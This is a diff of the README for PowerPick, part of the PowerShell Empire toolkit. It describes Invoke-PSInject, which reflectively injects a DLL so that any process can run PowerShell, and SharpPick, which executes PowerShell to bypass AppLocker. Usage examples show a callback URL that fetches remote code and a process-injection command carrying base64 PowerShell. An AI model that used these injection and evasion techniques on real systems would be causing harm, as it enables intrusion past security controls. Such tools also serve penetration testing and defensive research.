PowerShellEmpire/PowerTools/PowerPick/README.md

 Stark

 ## PSInject.ps1
-This project provides a powershell scipt (psinject.ps1) which implements the Invoke-PSInject function.
+This project provides a powershell scipt which implements the Invoke-PSInject function.
 This script is based off Powersploit's Invoke-ReflectivePEInjection and reflectively injects the ReflectivePick DLL.
-It allows for the replacement of the callback URL that is hard coded into the DLL.
+It allows for the replacement of the powershell code to execute that is hard coded into the DLL.
 See this script for more details.

-The script that it calls back for must be base64 encoded.
-To do this, you can simply use the built in linux utility 'base64'.
+When executed, you provide the "PoshCode" paramter which is base64 encoded powershell commands

 #### Example:
-	import-module psinject.ps1
+	import-module Invoke-PSInject.ps1
-	Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://1.1.1.1/favicon.ico
+	Invoke-PSInject -Verbose -PoshCode Y2FsYy5leGU= -ProcId 1111 -Verbose

 ## ReflectivePick
 This project is a reflective DLL based on Stephen Fewer's method.
 It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation.
 Due to its' reflective property, it can be injected into any process using a reflective injector and allows the execution of Powershell code by any process, not just Powershell.exe.
 It extends inject/migrate capabilities into powershell.

-This DLL is meant to be used with PSInject.ps1 which provide the ability to modify the hardcoded callback URL or with Metasploit after compiling or patching the URL manually.
+This DLL is meant to be used with PSInject.ps1 which provide the ability to modify the powerShell command or with Metasploit after compiling or patching the command manually.

 ## SharpPick
 This project is a .NET executable which allows execution of Powershell code through a number of methods.
 The script can be embedded as a resource, read from a url, appeneded to the binary, or read from a file.
 It was originally used as a proof of concept to demonstrate/test the blocking of powershell and bypass of applocker.